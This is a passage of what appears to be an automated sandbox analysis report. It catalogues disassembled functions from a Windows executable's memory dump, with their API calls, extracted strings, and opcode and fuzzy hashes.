                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: InfoQuerySystemVirtual
                                                                                                                                          • String ID: D
                                                                                                                                          • API String ID: 401686933-2746444292
                                                                                                                                          • Opcode ID: ff092e56c8372e88c93683ae2f97b479ad5bd3b0424adfe622a80b601be4d696
                                                                                                                                          • Instruction ID: 4f67f9524b09979aa25bfdc76ac6db6b02e4f79e72e9e4ea8ca5de5a0ce9784c
                                                                                                                                          • Opcode Fuzzy Hash: ff092e56c8372e88c93683ae2f97b479ad5bd3b0424adfe622a80b601be4d696
                                                                                                                                          • Instruction Fuzzy Hash: 2801F73260024D6BDB18DE29DC09BED7BEAAFC4324F0CC120EE59D7154D734D9458680
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 000FAF35
                                                                                                                                          • GetNumberFormatW.KERNEL32(00000400,00000000,?,0011E72C,?,?), ref: 000FAF84
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: FormatInfoLocaleNumber
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2169056816-0
                                                                                                                                          • Opcode ID: 046b28e8f02b10c7ad8134f6902af52bd8eacb2a0f88bc59ca7afe97aa82bbcd
                                                                                                                                          • Instruction ID: 941f39d1b3745245a50b2c9058b1af65359373e623b033ee895573cb70249f9e
                                                                                                                                          • Opcode Fuzzy Hash: 046b28e8f02b10c7ad8134f6902af52bd8eacb2a0f88bc59ca7afe97aa82bbcd
                                                                                                                                          • Instruction Fuzzy Hash: 7A01BC7A54030CBAD7108FA0ED05FDA77FCEF08310F009022FA04A71A0E370A955CBA5
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • GetVersionExW.KERNEL32(?), ref: 000EB16B
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Version
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1889659487-0
                                                                                                                                          • Opcode ID: cddf62681f6fe962e7c590eea553fb38ad10be196d3b8a603fee100891023056
                                                                                                                                          • Instruction ID: a56521f52de9fca5ec957e92301b9f582177b157dc0952c9899e684f3b42fb23
                                                                                                                                          • Opcode Fuzzy Hash: cddf62681f6fe962e7c590eea553fb38ad10be196d3b8a603fee100891023056
                                                                                                                                          • Instruction Fuzzy Hash: F4F054B5E00248AFDB28CB18ED916DA73F1F798315F1043A5EA15A3790C370ADC1CE64
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • _swprintf.LIBCMT ref: 000EE30E
                                                                                                                                            • Part of subcall function 000E4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000E40A5
                                                                                                                                            • Part of subcall function 000F1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,00121030,?,000ED928,00000000,?,00000050,00121030), ref: 000F1DC4
                                                                                                                                          • _strlen.LIBCMT ref: 000EE32F
                                                                                                                                          • SetDlgItemTextW.USER32(?,0011E274,?), ref: 000EE38F
                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 000EE3C9
                                                                                                                                          • GetClientRect.USER32(?,?), ref: 000EE3D5
                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 000EE475
                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 000EE4A2
                                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 000EE4DB
                                                                                                                                          • GetSystemMetrics.USER32(00000008), ref: 000EE4E3
                                                                                                                                          • GetWindow.USER32(?,00000005), ref: 000EE4EE
                                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 000EE51B
                                                                                                                                          • GetWindow.USER32(00000000,00000002), ref: 000EE58D
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                                                                                                          • String ID: $%s:$CAPTION$d
                                                                                                                                          • API String ID: 2407758923-2512411981
                                                                                                                                          • Opcode ID: 7af5dafbc4aa6a11d3f7197982c21cdbbda5e22483d18a30b3392ddc2375a59e
                                                                                                                                          • Instruction ID: 82ef8b7d3f8936985cd8909dc6f5a73cde51302dedfe8b2a0765d9b53185fe2e
                                                                                                                                          • Opcode Fuzzy Hash: 7af5dafbc4aa6a11d3f7197982c21cdbbda5e22483d18a30b3392ddc2375a59e
                                                                                                                                          • Instruction Fuzzy Hash: 9481D372104385AFD710DF69CD88A6FBBE9EBC9704F04092DFA94E3291D771E9058B52
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • ___free_lconv_mon.LIBCMT ref: 0010CB66
                                                                                                                                            • Part of subcall function 0010C701: _free.LIBCMT ref: 0010C71E
                                                                                                                                            • Part of subcall function 0010C701: _free.LIBCMT ref: 0010C730
                                                                                                                                            • Part of subcall function 0010C701: _free.LIBCMT ref: 0010C742
                                                                                                                                            • Part of subcall function 0010C701: _free.LIBCMT ref: 0010C754
                                                                                                                                            • Part of subcall function 0010C701: _free.LIBCMT ref: 0010C766
                                                                                                                                            • Part of subcall function 0010C701: _free.LIBCMT ref: 0010C778
                                                                                                                                            • Part of subcall function 0010C701: _free.LIBCMT ref: 0010C78A
                                                                                                                                            • Part of subcall function 0010C701: _free.LIBCMT ref: 0010C79C
                                                                                                                                            • Part of subcall function 0010C701: _free.LIBCMT ref: 0010C7AE
                                                                                                                                            • Part of subcall function 0010C701: _free.LIBCMT ref: 0010C7C0
                                                                                                                                            • Part of subcall function 0010C701: _free.LIBCMT ref: 0010C7D2
                                                                                                                                            • Part of subcall function 0010C701: _free.LIBCMT ref: 0010C7E4
                                                                                                                                            • Part of subcall function 0010C701: _free.LIBCMT ref: 0010C7F6
                                                                                                                                          • _free.LIBCMT ref: 0010CB5B
                                                                                                                                            • Part of subcall function 00108DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0010C896,?,00000000,?,00000000,?,0010C8BD,?,00000007,?,?,0010CCBA,?), ref: 00108DE2
                                                                                                                                            • Part of subcall function 00108DCC: GetLastError.KERNEL32(?,?,0010C896,?,00000000,?,00000000,?,0010C8BD,?,00000007,?,?,0010CCBA,?,?), ref: 00108DF4
                                                                                                                                          • _free.LIBCMT ref: 0010CB7D
                                                                                                                                          • _free.LIBCMT ref: 0010CB92
                                                                                                                                          • _free.LIBCMT ref: 0010CB9D
                                                                                                                                          • _free.LIBCMT ref: 0010CBBF
                                                                                                                                          • _free.LIBCMT ref: 0010CBD2
                                                                                                                                          • _free.LIBCMT ref: 0010CBE0
                                                                                                                                          • _free.LIBCMT ref: 0010CBEB
                                                                                                                                          • _free.LIBCMT ref: 0010CC23
                                                                                                                                          • _free.LIBCMT ref: 0010CC2A
                                                                                                                                          • _free.LIBCMT ref: 0010CC47
                                                                                                                                          • _free.LIBCMT ref: 0010CC5F
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 161543041-0
                                                                                                                                          • Opcode ID: 697ca6c05bc447180c7283dc97604aa22689a45d2ae46d4a212b8d7f395e8bc9
                                                                                                                                          • Instruction ID: b7368613a0066d56f360bff29889aa314efef7706778550b8812a1343a39d653
                                                                                                                                          • Opcode Fuzzy Hash: 697ca6c05bc447180c7283dc97604aa22689a45d2ae46d4a212b8d7f395e8bc9
                                                                                                                                          • Instruction Fuzzy Hash: 71314F3160420A9FEB21AB78D946B5AB7E9AF20350F144629E5CDD71D1DFB1AC80CF50
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • GetWindow.USER32(?,00000005), ref: 000FD6C1
                                                                                                                                          • GetClassNameW.USER32(00000000,?,00000800), ref: 000FD6ED
                                                                                                                                            • Part of subcall function 000F1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,000EC116,00000000,.exe,?,?,00000800,?,?,?,000F8E3C), ref: 000F1FD1
                                                                                                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 000FD709
                                                                                                                                          • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 000FD720
                                                                                                                                          • GetObjectW.GDI32(00000000,00000018,?), ref: 000FD734
                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 000FD75D
                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 000FD764
                                                                                                                                          • GetWindow.USER32(00000000,00000002), ref: 000FD76D
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                                                                                                          • String ID: STATIC
                                                                                                                                          • API String ID: 3820355801-1882779555
                                                                                                                                          • Opcode ID: f4a4c282078820cfd4807fcb9e3d7741d1be4bc914bc7bffd14bd7ac3498d174
                                                                                                                                          • Instruction ID: b81ec1cccb47e50c99ea6baf9df01663e467c820fdfa48cf2a34662adf7896e0
                                                                                                                                          • Opcode Fuzzy Hash: f4a4c282078820cfd4807fcb9e3d7741d1be4bc914bc7bffd14bd7ac3498d174
                                                                                                                                          • Instruction Fuzzy Hash: D61127762047187BE2217B709C4AFFF769DAF42B11F004121FB11A68A2EA64CA4562A1
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • _free.LIBCMT ref: 00109705
                                                                                                                                            • Part of subcall function 00108DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0010C896,?,00000000,?,00000000,?,0010C8BD,?,00000007,?,?,0010CCBA,?), ref: 00108DE2
                                                                                                                                            • Part of subcall function 00108DCC: GetLastError.KERNEL32(?,?,0010C896,?,00000000,?,00000000,?,0010C8BD,?,00000007,?,?,0010CCBA,?,?), ref: 00108DF4
                                                                                                                                          • _free.LIBCMT ref: 00109711
                                                                                                                                          • _free.LIBCMT ref: 0010971C
                                                                                                                                          • _free.LIBCMT ref: 00109727
                                                                                                                                          • _free.LIBCMT ref: 00109732
                                                                                                                                          • _free.LIBCMT ref: 0010973D
                                                                                                                                          • _free.LIBCMT ref: 00109748
                                                                                                                                          • _free.LIBCMT ref: 00109753
                                                                                                                                          • _free.LIBCMT ref: 0010975E
                                                                                                                                          • _free.LIBCMT ref: 0010976C
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                          • Opcode ID: 9144e5c033c4802141ede2f9db1d712a2b1c1ad20efe773b8cf007d19f5f788f
                                                                                                                                          • Instruction ID: 927d7c803db5ee1b09e0d0aeb633559f5ae99957028873ea29a51cf35ff25974
                                                                                                                                          • Opcode Fuzzy Hash: 9144e5c033c4802141ede2f9db1d712a2b1c1ad20efe773b8cf007d19f5f788f
                                                                                                                                          • Instruction Fuzzy Hash: AE11A77612410EAFCB01EF94C942CD93B75EF24350B5155A1FA884F1A2DFB2DA509B84
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                                                                                                          • String ID: csm$csm$csm
                                                                                                                                          • API String ID: 322700389-393685449
                                                                                                                                          • Opcode ID: a704afe13dbfb40299cd37add8b5d7261f43d1a6df2801bd1ac7517953b4daf5
                                                                                                                                          • Instruction ID: a28c824e747fce87116a133be6b003af9a0955e94e8123b7340b9c0cfe70074a
                                                                                                                                          • Opcode Fuzzy Hash: a704afe13dbfb40299cd37add8b5d7261f43d1a6df2801bd1ac7517953b4daf5
                                                                                                                                          • Instruction Fuzzy Hash: 49B1AF71900209DFCF29DFA4C8859AEB7B9FF18310F14415AF8A56B292C7B1DA52CB91
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • __EH_prolog.LIBCMT ref: 000E6FAA
                                                                                                                                          • _wcslen.LIBCMT ref: 000E7013
                                                                                                                                          • _wcslen.LIBCMT ref: 000E7084
                                                                                                                                            • Part of subcall function 000E7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 000E7AAB
                                                                                                                                            • Part of subcall function 000E7A9C: GetLastError.KERNEL32 ref: 000E7AF1
                                                                                                                                            • Part of subcall function 000E7A9C: CloseHandle.KERNEL32(?), ref: 000E7B00
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                                                                                                                          • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                                                          • API String ID: 3122303884-3508440684
                                                                                                                                          • Opcode ID: 0aebaeabe86412607879a154e9aad9042da57b0cc67f13978722a60d17462a8d
                                                                                                                                          • Instruction ID: dd5adcf63f1fb540170f0b3f461fe87341bb6ccef383cc5e4acb31844ce9e843
                                                                                                                                          • Opcode Fuzzy Hash: 0aebaeabe86412607879a154e9aad9042da57b0cc67f13978722a60d17462a8d
                                                                                                                                          • Instruction Fuzzy Hash: 2E41B1B1D083C4BEEB30E7759D82FEE77AC9F58344F004455FA59B6183D774AA888621
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • _wcslen.LIBCMT ref: 000F9736
                                                                                                                                          • _wcslen.LIBCMT ref: 000F97D6
                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 000F97E5
                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 000F9806
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: _wcslen$AllocByteCharGlobalMultiWide
                                                                                                                                          • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                                                                                          • API String ID: 1116704506-4209811716
                                                                                                                                          • Opcode ID: 7b0f2c2388aebcbf1a981197a912d066c78f2a607e0332c813f68406a5a076ba
                                                                                                                                          • Instruction ID: 0d3af84a571d1218d95e59259aba55e803ef104058e62a87dbfd05ab923e63ed
                                                                                                                                          • Opcode Fuzzy Hash: 7b0f2c2388aebcbf1a981197a912d066c78f2a607e0332c813f68406a5a076ba
                                                                                                                                          • Instruction Fuzzy Hash: 3F3168325083057BE729AF30DC06FBF779C9F52720F14021DF611965D2EBA49A4583A5
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 000E1316: GetDlgItem.USER32(00000000,00003021), ref: 000E135A
                                                                                                                                            • Part of subcall function 000E1316: SetWindowTextW.USER32(00000000,001135F4), ref: 000E1370
                                                                                                                                          • EndDialog.USER32(?,00000001), ref: 000FB610
                                                                                                                                          • SendMessageW.USER32(?,00000080,00000001,?), ref: 000FB637
                                                                                                                                          • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 000FB650
                                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 000FB661
                                                                                                                                          • GetDlgItem.USER32(?,00000065), ref: 000FB66A
                                                                                                                                          • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 000FB67E
                                                                                                                                          • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 000FB694
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: MessageSend$Item$TextWindow$Dialog
                                                                                                                                          • String ID: LICENSEDLG
                                                                                                                                          • API String ID: 3214253823-2177901306
                                                                                                                                          • Opcode ID: 455607bc931c8836b0f4982994662501b2f13cdad68b9371fbc0f9431f78541d
                                                                                                                                          • Instruction ID: 8aac429ca41ad58967b8074c462a756f59b2cffa81044a439eb77a6e8d8149c5
                                                                                                                                          • Opcode Fuzzy Hash: 455607bc931c8836b0f4982994662501b2f13cdad68b9371fbc0f9431f78541d
                                                                                                                                          • Instruction Fuzzy Hash: 4821C931644209BBD2215F75ED49F7B3BADEB4BB41F010014F704D6CF1CB569981AA35
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,37C5CE4C,00000001,00000000,00000000,?,?,000EAF6C,ROOT\CIMV2), ref: 000FFD99
                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,000EAF6C,ROOT\CIMV2), ref: 000FFE14
                                                                                                                                          • SysAllocString.OLEAUT32(00000000), ref: 000FFE1F
                                                                                                                                          • _com_issue_error.COMSUPP ref: 000FFE48
                                                                                                                                          • _com_issue_error.COMSUPP ref: 000FFE52
                                                                                                                                          • GetLastError.KERNEL32(80070057,37C5CE4C,00000001,00000000,00000000,?,?,000EAF6C,ROOT\CIMV2), ref: 000FFE57
                                                                                                                                          • _com_issue_error.COMSUPP ref: 000FFE6A
                                                                                                                                          • GetLastError.KERNEL32(00000000,?,?,000EAF6C,ROOT\CIMV2), ref: 000FFE80
                                                                                                                                          • _com_issue_error.COMSUPP ref: 000FFE93
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1353541977-0
                                                                                                                                          • Opcode ID: e39526699e00b23eb14e4cb4f30cf1bc21b95fe5c2bf82dbd2581def69227268
